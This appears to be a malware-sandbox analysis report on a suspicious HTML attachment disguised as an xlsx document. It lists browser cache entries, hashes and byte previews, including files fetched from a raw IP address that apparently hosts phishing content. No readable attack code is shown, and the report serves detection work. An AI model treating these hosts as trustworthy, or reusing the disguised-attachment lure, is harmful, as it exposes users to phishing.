        Preview:wOF2.......8.......E.............................6.$. .`..t..N..t.x.... %..qD....a.....yPF.....PUU....j?.._~.?../..........l..|...c.[{...F..{.1D"."._..h...?.q?K.i....L).u..L..k71..sL.....e]d..Ir.c.j......}.....V../.B^@r.......GE..y......T.*..Lm.l..]V[J;.I:..C......e.=.......G.K.......V......`wA.4U.t...tMwI.-.l..!........b..a.%....|_b.\ _"...<....}._..\.U3..=.5..F`I..d;.-S...7|....q..,d)Y.&YRv.w>.Q.r{.2gi......Gz"..h@.d.h.v..qv...'.N.s....6..O...'GyUU0L.....W=.R.=p}...|./.?...f.HK..............0......Qw$......_.T.T.D..1Ir:K.LgYV~Q..CH{G.*.03ws..$..,h...l.h.hF<#...hF.(..k5..jI.e.w_.w7ZB-..X.T......[I..eGI...A..lg.-..b.......l..R.*.hE...6..2..T-............ ..i..&....2,h\.l\.!...O........|...Jbd..v.FIk.,.,%....g.{_.5.E.."2...0^$`.H.x..Ed.'2..J..^ ...K....@...z.p....x.p..$GD._..#.]m...V..%..5[....5Z......V.AV.H..........CIH~...'....qY....x...X...$..e.,.TD..7~.4..cK. ..i^...?u.$.k..E..Lb.....`....U...D.D-..w.I.c.F#.. ...uo.,.i[..&....o|<.......z\.k

        Chrome Cache Entry: 82

        Download File
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PDF document, version 1.5, 9 pages
        Category:downloaded
        Size (bytes):504078
        Entropy (8bit):7.986005184841772
        Encrypted:false
        SSDEEP:
        MD5:17B0ADA57F4DA88C4FDABF021C4EB035
        SHA1:DB97F50D63621FC070AA41077D7A2DA89B044A34
        SHA-256:16BC3D5D340C8657739F67BF826171E1386790C3486C85BD47246E985D74E8CD
        SHA-512:83712E0C37D03ABF51996EBF13D9733DD0A0B97580F68D697D77463D012F31594A759A2C5D3BA7A0C20DA8AF588F7C5966BDEC6F26F85F9C778511BF813AFFCA
        Malicious:false
        Reputation:unknown
        URL:http://193.169.105.103//data/background.pdf
        Preview:%PDF-1.5..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en-GB) /StructTreeRoot 56 0 R/MarkInfo<</Marked true>>>>..endobj..2 0 obj..<</Type/Pages/Count 9/Kids[ 3 0 R 30 0 R 34 0 R 36 0 R 38 0 R 40 0 R 42 0 R 44 0 R 46 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 9 0 R/F3 11 0 R/F4 16 0 R/F5 18 0 R/F6 23 0 R/F7 28 0 R>>/XObject<</Image7 7 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 595.32 841.92] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 4160>>..stream..x..[Ko.8..7...G{.(...L.E'...bwf.'.....8r,...%'.....IY.E..b..D........n.i9i.....-'..I|.zX....a.R]..|..e[..77...N.>|.p.E.).0.......?).(..XdE.D.a..C(.../.?|......>~.L..Csd.d<.P..TP$D...HLh...E.\e.~%~..A|...W......z/B..h....4.YR.)3.p@Q.(Z.2.................P%J..._..].:.T..8...8.M.....X._Sq_.f|....Gk.....8.m....y..~....WC..i....C..7.......;.`...........XF.8ojQ..8...g.7.D...

        Chrome Cache Entry: 84

        Download File
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:gzip compressed data, from Unix, original size modulo 2^32 1268
        Category:downloaded
        Size (bytes):726
        Entropy (8bit):7.7003424349020575
        Encrypted:false
        SSDEEP:
        MD5:DA3F131058C89D4989367C6F0329538D
        SHA1:7B4C0CE7919D1EC99ADC343882BE026D46FD6FA2
        SHA-256:15F61D4B5A53C63E72477EC9902890FDF82F97DF647AF1ECDED0122325EE5D13
        SHA-512:0D0538E4BD194D172FB8E4CAF62A9F2CD7B4F7E9F4BBA3ABB1B581B25A858AB55C6D93FDAA36134D0798F05E372A60AB2830ADDA859B74F1B5EF41498D59D3A3
        Malicious:false
        Reputation:unknown
        URL:http://193.169.105.103/index.php
        Preview:..........uT..8.~n..!.R.k....#$.C.HHH ....q....;g..[....]...d~y./i..z......Z/......KP'..._/....q..w..Oo..]....F..h.O@..QS......F.......\.Np.]...K.p........\0ex/..Z.~,...8:ot..y...2y36pQ>...?).r.6...DQq.iN...g.b6.5w.;6...x.L.(c..............Jnu.=...A....-'.U.s.?...Rk.s.q..r;..?......(..L.<.{...Fn.. K...4.......0P9PR#...MX.......K.u1pB\>...`...0..m...).*..S_..(.[.m..r.....k.B.....{..&.PLb^.K...R.k..I.......~3.!p...........~q...2.9.i~z.>.s..1..<...J<E.^..u.Z.........3...-,...0..E.........[........>z.Jn.......)....Y...2.?.h..E{......$C..CUC.yUgY$.=......@........yz....k~..4.U....^..5.........h..nLV1.....8f..Y.M..A.V.dl.{|...E.._P...D..Q...3N..j:....~...g%<...$..Ad.... ..g....

        Chrome Cache Entry: 87

        Download File
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (65447)
        Category:dropped
        Size (bytes):89795
        Entropy (8bit):5.290870198529059
        Encrypted:false
        SSDEEP:
        MD5:641DD14370106E992D352166F5A07E99
        SHA1:EDA46747C71D38A880BEE44F9A439C3858BB8F99
        SHA-256:A0FE8723DCF55DA64D06B25446D0A8513E52527C45AFCB37073465F9C6F352AF
        SHA-512:A6E981B23351186AA43F32879DD64C6801BE6E2AF7EF8B0E472CCCDEEBA52D5D7894DE4BCB292A364F1E11E525524077534338140A72687ADA4FAE62849843A5
        Malicious:false
        Reputation:unknown
        Preview:/*! jQuery v3.6.4 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,y=n.hasOwnProperty,a=y.toString,l=a.call(Object),v={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

        Chrome Cache Entry: 89

        Download File
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (58966)
        Category:downloaded
        Size (bytes):96518
        Entropy (8bit):4.751629736723021
        Encrypted:false
        SSDEEP:
        MD5:FBF1F3445F2554BCE753C92CF6851B41
        SHA1:3C73FF1CD7B97C189F139367DBAC43DCF5D2C70D
        SHA-256:E5E202E3C899507992952533F57B634722B69B34241D271963559D31AA33EF81
        SHA-512:29CDF6DEF18112ACD39A8B801029D571EC90AB2A9DB128AA2D021204BDBD6945B853F33BA523C0FE0114650AAFD5CC31E0E9D8C53C6F7B950C839193E8BE0926
        Malicious:false
        Reputation:unknown
        URL:https://use.fontawesome.com/releases/v6.6.0/css/all.css
        Preview:/*!. * Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */..fa{font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:var(--fa-style,900)}.fa,.fa-brands,.fa-classic,.fa-regular,.fa-sharp-solid,.fa-solid,.fab,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-classic,.fa-regular,.fa-solid,.far,.fas{font-family:"Font Awesome 6 Free"}.fa-brands,.fab{font-family:"Font Awesome 6 Brands"}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em

        Chrome Cache Entry: 90

        Download File
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:gzip compressed data, from Unix, original size modulo 2^32 12463
        Category:dropped
        Size (bytes):6943
        Entropy (8bit):7.967498911231538
        Encrypted:false
        SSDEEP:
        MD5:CE97B7581732D90E273A406B422C3140
        SHA1:4A34D81C548BBAD64AFA40F4D702DF5E23DB72AA
        SHA-256:B7BE0CCB3C92023A89BEF9777CD0B5324966D5B7FF99EDECEE3AD44104B66CD8
        SHA-512:6C16C20EA4864C7DA9C3EAE262256E7990E00C309EF907507B538F185A9A82C852A81DD621CE0F2CF853AF97AB223B344936E8C9F76FBCC0291AE5D01514E383
        Malicious:false
        Reputation:unknown
        Preview:...........{.......M..G.QW.@ .wu.H .....I....7..$...;.a.....o....cl..a._.8u.RU_...R...u_+W.$...n9...D.^.|..y>.v..,.<........v...^.I..q...c....>3n.....{.r..Nj..0!...K..*...O...*n..4n.....B...|}F....7.<7.Yw..|yp...n..$_: ..Pz..~F...O9d..k..).Z........O.......M.......l..:.+.....q..':...>.O...S[.OG...\Po2...../.:]..t.....2?w._.v.e.Y.<'V..V.sSb9.p.a.....G>..,z%Z..(......B..c..U.}..4......*....R..u.X..=.Vc9.;....{!.U...d.....=f..R...b..o.K..w.*...n.....Kg.T..Xy.u.v.i....>.....W.._%r..F`..=.W.s8......[#..v..w.K..B...[....P.7.5Va}..0..{..*..............;1n...<..?...H,.........'.....0...oY..Nq...;..6T_.{S5i ....m@9qV.....T.O...+..$....ag...".?..:..O..7!.......5}.R.M.....V...Y,...m(.%H....(....&n...kH97...q5.....o..[.M.....23............,.O.:U[.b..}.[..wR.#c...S6.i.......{2.w..]z.@j9..C.e..'qv..%.?....*..!.O._./...DUE.E....qK.....f.^.u........A|...4.w..E.. ..(...m@.....Q..B.=sy...c..;..g..r`ns,/...4..._;..aNI..P8y.w3oke.]..T..o.../.....x..|.

        Static File Info

        General

        File type:HTML document, ASCII text, with very long lines (1532), with CRLF, LF line terminators
        Entropy (8bit):4.571373206396365
        TrID:
        • HyperText Markup Language (15015/1) 20.56%
        • HyperText Markup Language (12001/1) 16.44%
        • HyperText Markup Language (12001/1) 16.44%
        • HyperText Markup Language (11501/1) 15.75%
        • HyperText Markup Language (11501/1) 15.75%
        File name:New xlsx docs074252657723824 - Tuesday, December 3, 2024 at 03_42_05 PM_html
        File size:3'176 bytes
        MD5:08db93d511d253f76db7c3b31c7b636e
        SHA1:d7c9611167e2f1fe18c4f330c0424dbea080039d
        SHA256:670ab3178e0574739e2422c42519ab8d171daaaee9b481da0730c236cd3001af
        SHA512:886995d51984bd09943ebbd641b6a13e804508fbf2840643e209e75e5ca723f9b9d5cb0f9fba9fd5757b0b389129588027decc991f74695dd4e172b6c3cc3e81
        SSDEEP:48:t4peBCZpwAzjvnXYN6dGn5o96nxoZ9+bLbWbqTZOFNCqlLsCEmaVetCy5BTsK:+Jp1jvnHs5ZSZ9+bLbxVD2bN5N
        TLSH:2D61A833B74607B606D252706F2E7ADAE339C07C5771C134584A907A3747C7AA27BAD8
        File Content Preview:<!DOCTYPE html>..<html lang="ru">..<head>...<meta charset="UTF-8">...<meta name="viewport" content="width=device-width, initial-scale=1.0">...<title></title>...<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>..</head>..<body>..<div id="

        File Icon

        Icon Hash:173149cccc490307